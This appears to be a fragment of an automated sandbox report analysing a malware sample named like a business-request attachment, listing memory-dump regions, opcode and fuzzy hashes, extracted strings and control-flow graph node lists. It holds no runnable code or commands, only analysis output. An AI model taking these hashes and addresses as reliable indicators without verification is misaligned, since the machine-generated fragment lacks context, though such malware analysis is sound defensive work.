                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Tep
                                                                                                                                                    • API String ID: 0-914316021
                                                                                                                                                    • Opcode ID: 7e272509f5a97b870926c1f20705fa5080de19f8043f858f2fd11833348d744e
                                                                                                                                                    • Instruction ID: 849e571a4f08576b5204a7951859dd138bb1a3da9b42c9550bdd5a1e30449967
                                                                                                                                                    • Opcode Fuzzy Hash: 7e272509f5a97b870926c1f20705fa5080de19f8043f858f2fd11833348d744e
                                                                                                                                                    • Instruction Fuzzy Hash: C6A1E270E05218CFDB24CFA9D984BEDBBF2BF89300F249169D419AB259DB765985CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4ee6a0a2a08cda26d88c38b4e5ec5ade2ea9595ca84394c26b102f2816d41aa8
                                                                                                                                                    • Instruction ID: 945610f41e63f42211a84990795f370b952817ab6e5cf8b583e85e45dd02018d
                                                                                                                                                    • Opcode Fuzzy Hash: 4ee6a0a2a08cda26d88c38b4e5ec5ade2ea9595ca84394c26b102f2816d41aa8
                                                                                                                                                    • Instruction Fuzzy Hash: 1D32C374A042298FCB65DF28C884BA9B7B6FF48300F5585E9E90DA7355DB31AE81CF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 025595225401ac0b12a935dbacc09dc1dcd913bf4cee6bf51a4da24fd6fb9174
                                                                                                                                                    • Instruction ID: ba36a04d031adcba4f10d7597caad34c9d9a5418be45335f782f5e64a0545f6b
                                                                                                                                                    • Opcode Fuzzy Hash: 025595225401ac0b12a935dbacc09dc1dcd913bf4cee6bf51a4da24fd6fb9174
                                                                                                                                                    • Instruction Fuzzy Hash: 00B10570E06218CFDB55DFA9D984BADBBF2FB49300F1091AAD409A7295DB359E81DF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 911fc154aa779883734d1b48a2e6ea6613fa265b0148c6be97c0cb3e9709854b
                                                                                                                                                    • Instruction ID: caa398cad74f7497655f192fc6c9cc5c53429b3e370171d53a939ebfbc89da83
                                                                                                                                                    • Opcode Fuzzy Hash: 911fc154aa779883734d1b48a2e6ea6613fa265b0148c6be97c0cb3e9709854b
                                                                                                                                                    • Instruction Fuzzy Hash: 33A1D175E01218CFDB14CFA9D984BDDBBF2BF89304F14A16AD909AB255DB349985CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a5815eafe40832eed0bf592e6643a12a16e5327f84f82031f8f9ee6f18bf7947
                                                                                                                                                    • Instruction ID: 069b2b62e67ed1bf3bd39d200554fa7a20a8e8f693e388b5baced8b8e76ec0fb
                                                                                                                                                    • Opcode Fuzzy Hash: a5815eafe40832eed0bf592e6643a12a16e5327f84f82031f8f9ee6f18bf7947
                                                                                                                                                    • Instruction Fuzzy Hash: 57510EB1E056588BEB19CF6BD84029ABBF3AFC9300F14C1BAD548AB259DB340985CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (E>$(E>$(E>$(E>$(E>$(E>$0<>$0<>$0<>$0<>$0<>$0<>$4'p$4'p$\C>$\C>$\C>$\C>$\C>$\C>$xD>$xD>$xD>$xD>$xD>$xD>
                                                                                                                                                    • API String ID: 0-1657193524
                                                                                                                                                    • Opcode ID: 786b69b646f54306b7e36057bb58973a017f9e6aae50805f47c580e072428c03
                                                                                                                                                    • Instruction ID: 57e51660185f89060b9838815775575c7d0c0eb83ae44a2509568d1200b0c35b
                                                                                                                                                    • Opcode Fuzzy Hash: 786b69b646f54306b7e36057bb58973a017f9e6aae50805f47c580e072428c03
                                                                                                                                                    • Instruction Fuzzy Hash: 72F2B170949394DFDB178BA8CC58BAE7FB8EF46340F55409AE540AB2E2C3785C45CB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1192 46af7a0-46af7c8 1194 46af7ce-46af7d2 1192->1194 1195 46af8b4-46af8d9 1192->1195 1196 46af7e6-46af7ea 1194->1196 1197 46af7d4-46af7e0 1194->1197 1204 46af8e0-46af904 1195->1204 1198 46af90b-46af930 1196->1198 1199 46af7f0-46af807 1196->1199 1197->1196 1197->1204 1218 46af937-46af98a 1198->1218 1210 46af81b-46af81f 1199->1210 1211 46af809-46af815 1199->1211 1204->1198 1213 46af84b-46af864 call 46ac418 1210->1213 1214 46af821-46af83a 1210->1214 1211->1210 1211->1218 1225 46af88d-46af8b1 1213->1225 1226 46af866-46af88a 1213->1226 1214->1213 1227 46af83c-46af83f 1214->1227 1236 46af98c-46af9ac 1218->1236 1237 46af9c2-46af9e7 1218->1237 1231 46af848 1227->1231 1231->1213 1244 46af9ee-46afa42 1236->1244 1245 46af9ae-46af9bf 1236->1245 1237->1244 1251 46afa48-46afa54 1244->1251 1252 46afae9-46afb37 1244->1252 1255 46afa5e-46afa72 call 46aac20 1251->1255 1256 46afa56-46afa5d 1251->1256 1265 46afb39-46afb5d 1252->1265 1266 46afb67-46afb6d 1252->1266 1260 46afae1-46afae8 1255->1260 1261 46afa74-46afa99 1255->1261 1272 46afa9b-46afab5 1261->1272 1273 46afadc-46afadf 1261->1273 1265->1266 1268 46afb5f 1265->1268 1269 46afb7f-46afb8e 1266->1269 1270 46afb6f-46afb7c 1266->1270 1268->1266 1272->1273 1275 46afab7-46afac0 1272->1275 1273->1260 1273->1261 1276 46afacf-46afadb 1275->1276 1277 46afac2-46afac5 1275->1277 1277->1276
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$(p$(p$(p$(p
                                                                                                                                                    • API String ID: 0-1887976078
                                                                                                                                                    • Opcode ID: b146487b111fe75dfd4cc569c41d49dd41fed87fa921e5eefbe2b7f48772ecb2
                                                                                                                                                    • Instruction ID: 92c27d873ddbf6bd090e7c69ef44e3b469ddbe96df69fc173a7a554cc965a18a
                                                                                                                                                    • Opcode Fuzzy Hash: b146487b111fe75dfd4cc569c41d49dd41fed87fa921e5eefbe2b7f48772ecb2
                                                                                                                                                    • Instruction Fuzzy Hash: 2DC104327006549FD718DF68E841AAE3BE6EFC5714B14816AE806CB3A5DB35EC07CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1278 1e61598-1e615bd 1280 1e615c4-1e615e1 1278->1280 1281 1e615bf 1278->1281 1282 1e61602 1280->1282 1283 1e615e3-1e615ec 1280->1283 1281->1280 1284 1e61605-1e61609 1282->1284 1285 1e615f3-1e615f6 1283->1285 1286 1e615ee-1e615f1 1283->1286 1287 1e61824-1e6183b 1284->1287 1288 1e61600 1285->1288 1286->1288 1290 1e61841-1e61845 1287->1290 1291 1e6160e-1e61612 1287->1291 1288->1284 1294 1e61847-1e6186c 1290->1294 1295 1e6186f-1e61873 1290->1295 1292 1e61614-1e616b2 1291->1292 1293 1e6161a-1e6161e 1291->1293 1304 1e616b4-1e61752 1292->1304 1305 1e616ba-1e616be 1292->1305 1299 1e61620-1e61639 1293->1299 1300 1e61648-1e6166d 1293->1300 1294->1295 1296 1e61894 1295->1296 1297 1e61875-1e6187e 1295->1297 1303 1e61897-1e6189d 1296->1303 1301 1e61885-1e61888 1297->1301 1302 1e61880-1e61883 1297->1302 1335 1e61642-1e61645 1299->1335 1323 1e6168e 1300->1323 1324 1e6166f-1e61678 1300->1324 1307 1e61892 1301->1307 1302->1307 1313 1e61754-1e617ef 1304->1313 1314 1e6175a-1e6175e 1304->1314 1310 1e616c0-1e616e5 1305->1310 1311 1e616e8-1e6170d 1305->1311 1307->1303 1310->1311 1340 1e6172e 1311->1340 1341 1e6170f-1e61718 1311->1341 1326 1e617f1-1e61816 1313->1326 1327 1e61819-1e6181c 1313->1327 1319 1e61760-1e61785 1314->1319 1320 1e61788-1e617ad 1314->1320 1319->1320 1351 1e617ce 1320->1351 1352 1e617af-1e617b8 1320->1352 1332 1e61691-1e61698 1323->1332 1330 1e6167f-1e61682 1324->1330 1331 1e6167a-1e6167d 1324->1331 1326->1327 1327->1287 1337 1e6168c 1330->1337 1331->1337 1338 1e6169a-1e616a0 1332->1338 1339 1e616a8-1e616a9 1332->1339 1335->1300 1337->1332 1338->1339 1339->1287 1342 1e61731-1e61738 1340->1342 1346 1e6171f-1e61722 1341->1346 1347 1e6171a-1e6171d 1341->1347 1348 1e6173a-1e61740 1342->1348 1349 1e61748-1e61749 1342->1349 1353 1e6172c 1346->1353 1347->1353 1348->1349 1349->1287 1356 1e617d1-1e617d8 1351->1356 1354 1e617bf-1e617c2 1352->1354 1355 1e617ba-1e617bd 1352->1355 1353->1342 1359 1e617cc 1354->1359 1355->1359 1360 1e617da-1e617e0 1356->1360 1361 1e617e8-1e617e9 1356->1361 1359->1356 1360->1361 1361->1287
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0<>$0<>$4'p$4'p
                                                                                                                                                    • API String ID: 0-974067172
                                                                                                                                                    • Opcode ID: a4d8d8683eb00405441bbf94b060426a50546afdd2421f03f690156d8540c10e
                                                                                                                                                    • Instruction ID: 1e99ee4be05a1052ed48b042da6b7d7dccdb4731c53741f57832f65efeea67d1
                                                                                                                                                    • Opcode Fuzzy Hash: a4d8d8683eb00405441bbf94b060426a50546afdd2421f03f690156d8540c10e
                                                                                                                                                    • Instruction Fuzzy Hash: 64A1F638E00209CFCB1ADFA9D4486EDBBB6FF89345F509169E412A7390CB785942CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1362 1f1b9d8-1f1ba00 1364 1f1ba02-1f1ba49 1362->1364 1365 1f1ba4e-1f1ba5c 1362->1365 1407 1f1bea5-1f1beac 1364->1407 1366 1f1ba6b 1365->1366 1367 1f1ba5e-1f1ba69 1365->1367 1368 1f1ba6d-1f1ba74 1366->1368 1367->1368 1371 1f1ba7a-1f1ba7e 1368->1371 1372 1f1bb5d-1f1bb61 1368->1372 1375 1f1ba84-1f1ba88 1371->1375 1376 1f1bead-1f1bed5 1371->1376 1373 1f1bb63-1f1bb72 1372->1373 1374 1f1bbb7-1f1bbc1 1372->1374 1388 1f1bb76-1f1bb7b 1373->1388 1378 1f1bbc3-1f1bbd2 1374->1378 1379 1f1bbfa-1f1bc20 1374->1379 1380 1f1ba9a-1f1baf8 1375->1380 1381 1f1ba8a-1f1ba94 1375->1381 1384 1f1bedc-1f1bf06 1376->1384 1392 1f1bbd8-1f1bbf5 1378->1392 1393 1f1bf0e-1f1bf24 1378->1393 1404 1f1bc22-1f1bc2b 1379->1404 1405 1f1bc2d 1379->1405 1416 1f1bf6b-1f1bf95 1380->1416 1417 1f1bafe-1f1bb58 1380->1417 1381->1380 1381->1384 1384->1393 1394 1f1bb74 1388->1394 1395 1f1bb7d-1f1bbb2 1388->1395 1392->1407 1418 1f1bf2c-1f1bf64 1393->1418 1394->1388 1395->1407 1409 1f1bc2f-1f1bc57 1404->1409 1405->1409 1422 1f1bd28-1f1bd2c 1409->1422 1423 1f1bc5d-1f1bc63 1409->1423 1437 1f1bf97-1f1bf9d 1416->1437 1438 1f1bf9f-1f1bfa5 1416->1438 1417->1407 1418->1416 1426 1f1bda6-1f1bdb0 1422->1426 1427 1f1bd2e-1f1bd47 1422->1427 1431 1f1bc6b-1f1bc76 1423->1431 1429 1f1bdb2-1f1bdbc 1426->1429 1430 1f1be0d-1f1be16 1426->1430 1427->1426 1452 1f1bd49-1f1bd58 1427->1452 1446 1f1bdc2-1f1bdd4 1429->1446 1447 1f1bdbe-1f1bdc0 1429->1447 1435 1f1be18-1f1be46 1430->1435 1436 1f1be4e-1f1be9b 1430->1436 1431->1422 1448 1f1bc7c-1f1bc8b 1431->1448 1435->1436 1457 1f1bea3 1436->1457 1437->1438 1443 1f1bfa6-1f1bfe3 1437->1443 1453 1f1bdd6-1f1bdd8 1446->1453 1447->1453 1466 1f1bca3-1f1bcb8 1448->1466 1467 1f1bc8d-1f1bc93 1448->1467 1471 1f1bd70-1f1bd7b 1452->1471 1472 1f1bd5a-1f1bd60 1452->1472 1455 1f1be06-1f1be0b 1453->1455 1456 1f1bdda-1f1bdde 1453->1456 1455->1429 1455->1430 1461 1f1bde0-1f1bdf9 1456->1461 1462 1f1bdfc-1f1bdff 1456->1462 1457->1407 1461->1462 1462->1455 1469 1f1bcba-1f1bce6 1466->1469 1470 1f1bcec-1f1bcf5 1466->1470 1473 1f1bc95 1467->1473 1474 1f1bc97-1f1bc99 1467->1474 1469->1418 1469->1470 1470->1416 1478 1f1bcfb-1f1bd22 1470->1478 1471->1416 1481 1f1bd81-1f1bda4 1471->1481 1479 1f1bd62 1472->1479 1480 1f1bd64-1f1bd66 1472->1480 1473->1466 1474->1466 1478->1422 1478->1448 1479->1471 1480->1471 1481->1426 1481->1452
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hp$Hp$Hp
                                                                                                                                                    • API String ID: 0-3665545250
                                                                                                                                                    • Opcode ID: 784168253111cbd1654760aa3eb9402ab5252c34c42af91288a50b44a307206c
                                                                                                                                                    • Instruction ID: 01c656057d98301d1956bb843305b434f8bc57c05d875c741f91a757ff130a61
                                                                                                                                                    • Opcode Fuzzy Hash: 784168253111cbd1654760aa3eb9402ab5252c34c42af91288a50b44a307206c
                                                                                                                                                    • Instruction Fuzzy Hash: A9124C71A00704DFDB29DFA9D494A6EBBF2FF88300B14852DE5069B359DB32AD46CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1493 1f1d280-1f1d2bd 1495 1f1d2df-1f1d2f5 call 1f1d088 1493->1495 1496 1f1d2bf-1f1d2c4 call 1f1dbf0 1493->1496 1502 1f1d66b-1f1d67f 1495->1502 1503 1f1d2fb-1f1d307 1495->1503 1499 1f1d2ca-1f1d2cc 1496->1499 1499->1495 1500 1f1d2ce-1f1d2d6 1499->1500 1500->1495 1513 1f1d6bf-1f1d6c8 1502->1513 1504 1f1d438-1f1d43f 1503->1504 1505 1f1d30d-1f1d310 1503->1505 1508 1f1d445-1f1d44e 1504->1508 1509 1f1d56e-1f1d5ab call 1f1ca90 call 1f1fe20 1504->1509 1506 1f1d313-1f1d31c 1505->1506 1511 1f1d760 1506->1511 1512 1f1d322-1f1d336 1506->1512 1508->1509 1514 1f1d454-1f1d560 call 1f1ca90 call 1f1d020 call 1f1ca90 1508->1514 1553 1f1d5b1-1f1d662 call 1f1ca90 1509->1553 1521 1f1d765-1f1d769 1511->1521 1528 1f1d428-1f1d432 1512->1528 1529 1f1d33c-1f1d3d1 call 1f1d088 * 2 call 1f1ca90 call 1f1d020 call 1f1d0c8 call 1f1d170 call 1f1d1d8 1512->1529 1515 1f1d6ca-1f1d6d1 1513->1515 1516 1f1d68d-1f1d696 1513->1516 1604 1f1d562 1514->1604 1605 1f1d56b 1514->1605 1519 1f1d6d3-1f1d716 call 1f1ca90 1515->1519 1520 1f1d71f-1f1d726 1515->1520 1516->1511 1523 1f1d69c-1f1d6ae 1516->1523 1519->1520 1530 1f1d728-1f1d738 1520->1530 1531 1f1d74b-1f1d75e 1520->1531 1526 1f1d774 1521->1526 1527 1f1d76b 1521->1527 1540 1f1d6b0-1f1d6b8 call 58cf188 1523->1540 1541 1f1d6be 1523->1541 1538 1f1d775 1526->1538 1527->1526 1528->1504 1528->1506 1584 1f1d3f0-1f1d423 call 1f1d1d8 1529->1584 1585 1f1d3d3-1f1d3eb call 1f1d170 call 1f1ca90 call 1f1cd40 1529->1585 1530->1531 1542 1f1d73a-1f1d742 1530->1542 1531->1521 1538->1538 1540->1541 1541->1513 1542->1531 1553->1502 1584->1528 1585->1584 1604->1605 1605->1509
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p$4'p$4'p
                                                                                                                                                    • API String ID: 0-3087666796
                                                                                                                                                    • Opcode ID: 0c0d68b95464d933497006a20b88925797f7213745d4bb8d0805062566164d15
                                                                                                                                                    • Instruction ID: e0acb7704d01e342d27642bcf67cb4052be931f788f823feefd63cd8e5ddb918
                                                                                                                                                    • Opcode Fuzzy Hash: 0c0d68b95464d933497006a20b88925797f7213745d4bb8d0805062566164d15
                                                                                                                                                    • Instruction Fuzzy Hash: 4CF1EF34B01619DFDB19DFA4D998A9DBBB2FF88300F158159E906AB365CB71EC42CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1609 1ef0978-1ef0988 1610 1ef098e-1ef0992 1609->1610 1611 1ef0aa1-1ef0ac6 1609->1611 1612 1ef0acd-1ef0af2 1610->1612 1613 1ef0998-1ef09a1 1610->1613 1611->1612 1615 1ef0af9-1ef0b2f 1612->1615 1613->1615 1616 1ef09a7-1ef09ce 1613->1616 1631 1ef0b36-1ef0b8c 1615->1631 1625 1ef0a96-1ef0aa0 1616->1625 1626 1ef09d4-1ef09d6 1616->1626 1629 1ef09d8-1ef09db 1626->1629 1630 1ef09f7-1ef09f9 1626->1630 1629->1631 1632 1ef09e1-1ef09eb 1629->1632 1633 1ef09fc-1ef0a00 1630->1633 1649 1ef0b8e-1ef0ba2 call 1ef0e48 1631->1649 1650 1ef0bb0-1ef0bbd 1631->1650 1632->1631 1635 1ef09f1-1ef09f5 1632->1635 1636 1ef0a02-1ef0a11 1633->1636 1637 1ef0a61-1ef0a6d 1633->1637 1635->1630 1635->1633 1636->1631 1642 1ef0a17-1ef0a5e 1636->1642 1637->1631 1639 1ef0a73-1ef0a90 1637->1639 1639->1625 1639->1626 1642->1637 1705 1ef0ba5 call 1ef11f2 1649->1705 1706 1ef0ba5 call 1ef1160 1649->1706 1707 1ef0ba5 call 1ef1200 1649->1707 1708 1ef0bbf call 1ef3f4a 1650->1708 1709 1ef0bbf call 1ef3f58 1650->1709 1710 1ef0bbf call 1ef3f50 1650->1710 1655 1ef0bab 1657 1ef0ddb-1ef0de6 1655->1657 1656 1ef0bc5-1ef0bc7 1659 1ef0bcd-1ef0cb3 1656->1659 1660 1ef0cb8-1ef0cc8 1656->1660 1666 1ef0de8-1ef0df8 1657->1666 1667 1ef0e15-1ef0e36 1657->1667 1659->1660 1664 1ef0cce-1ef0da8 1660->1664 1665 1ef0db6-1ef0dd2 1660->1665 1702 1ef0daa 1664->1702 1703 1ef0db3 1664->1703 1665->1657 1674 1ef0dfa-1ef0e00 1666->1674 1675 1ef0e08-1ef0e0e 1666->1675 1674->1675 1675->1667 1702->1703 1703->1665 1705->1655 1706->1655 1707->1655 1708->1656 1709->1656 1710->1656
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$(p$Hp
                                                                                                                                                    • API String ID: 0-3801172158
                                                                                                                                                    • Opcode ID: c0e889153da46b389e066a59817da92cd2696362f21e39cf41b4c37f64d15981
                                                                                                                                                    • Instruction ID: 9bb956fc9127ed04fcda760ed65e69ef64fe6e51bac8152dccfde1390f782399
                                                                                                                                                    • Opcode Fuzzy Hash: c0e889153da46b389e066a59817da92cd2696362f21e39cf41b4c37f64d15981
                                                                                                                                                    • Instruction Fuzzy Hash: 4EE16334A00209DFCB15EF68E49499DBBB2FF89310F108569F906AB365DB31ED46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1712 1f15c01-1f15c08 1713 1f15764-1f15770 1712->1713 1714 1f15c0e-1f15c16 1712->1714 1732 1f15773 call 1f173a0 1713->1732 1733 1f15773 call 1f1734f 1713->1733 1715 1f151ef-1f151f7 1714->1715 1717 1f15200-1f16d7c 1715->1717 1718 1f151f9 1715->1718 1716 1f15779-1f157b0 call 1f15050 1716->1715 1724 1f157b6-1f157be 1716->1724 1721 1f16d82-1f16d8a 1717->1721 1722 1f16ade-1f16b0f 1717->1722 1718->1717 1721->1715 1727 1f16b11-1f16b36 call 1f15050 1722->1727 1728 1f16b4c-1f16b57 1722->1728 1724->1715 1727->1715 1731 1f16b3c-1f16b44 1727->1731 1728->1715 1731->1715 1732->1716 1733->1716
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $h$y
                                                                                                                                                    • API String ID: 0-3058062038
                                                                                                                                                    • Opcode ID: 002f8c46ae0d0443f30049f3e2bc6108f70082d47dc64a309c246814479d8f37
                                                                                                                                                    • Instruction ID: 2cd2ca29b63df006093af37a52499f664b378e7aecd3bc096830e7c7e6ddcf94
                                                                                                                                                    • Opcode Fuzzy Hash: 002f8c46ae0d0443f30049f3e2bc6108f70082d47dc64a309c246814479d8f37
                                                                                                                                                    • Instruction Fuzzy Hash: B201C474D01229CFDB22DF54C9887DDBBB1BB4A315F5491DAC419B2254C7364A84CF45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1973 46acdd8-46acdf2 1974 46acdf8-46acdfa 1973->1974 1975 46acee6-46acf0b 1973->1975 1976 46acf12-46acf36 1974->1976 1977 46ace00-46ace0c 1974->1977 1975->1976 1989 46acf3d-46acf61 1976->1989 1982 46ace0e-46ace1a 1977->1982 1983 46ace20-46ace30 1977->1983 1982->1983 1982->1989 1983->1989 1990 46ace36-46ace44 1983->1990 1994 46acf68-46acfed call 46acfd8 call 46aa638 1989->1994 1993 46ace4a-46ace4f 1990->1993 1990->1994 2029 46ace51 call 46acdd8 1993->2029 2030 46ace51 call 46acfd8 1993->2030 2031 46ace51 call 46acdd0 1993->2031 2032 46ace51 call 46acfe0 1993->2032 2033 46ace51 call 46acfd0 1993->2033 2022 46acff2-46ad000 call 46ac4e0 1994->2022 1996 46ace57-46acea0 2011 46acea2-46acebb 1996->2011 2012 46acec3-46acee3 call 46ab2e0 1996->2012 2011->2012 2025 46ad018-46ad01a 2022->2025 2026 46ad002-46ad008 2022->2026 2027 46ad00a 2026->2027 2028 46ad00c-46ad00e 2026->2028 2027->2025 2028->2025 2029->1996 2030->1996 2031->1996 2032->1996 2033->1996
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$Hp
                                                                                                                                                    • API String ID: 0-3691929625
                                                                                                                                                    • Opcode ID: 7b9f52f56f1161fc5e50432a5bfc8c6e4fdae320f3df74f4f0e2bb3f2163b5fa
                                                                                                                                                    • Instruction ID: 17cf6ce726c52996b60d6cc72228215b8a6b558f7d37b366547773958673bc50
                                                                                                                                                    • Opcode Fuzzy Hash: 7b9f52f56f1161fc5e50432a5bfc8c6e4fdae320f3df74f4f0e2bb3f2163b5fa
                                                                                                                                                    • Instruction Fuzzy Hash: F7519A30B007009FD729AF68D454A2E7BA7AFC9714B64446DE4168B3A5DF35EC07CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
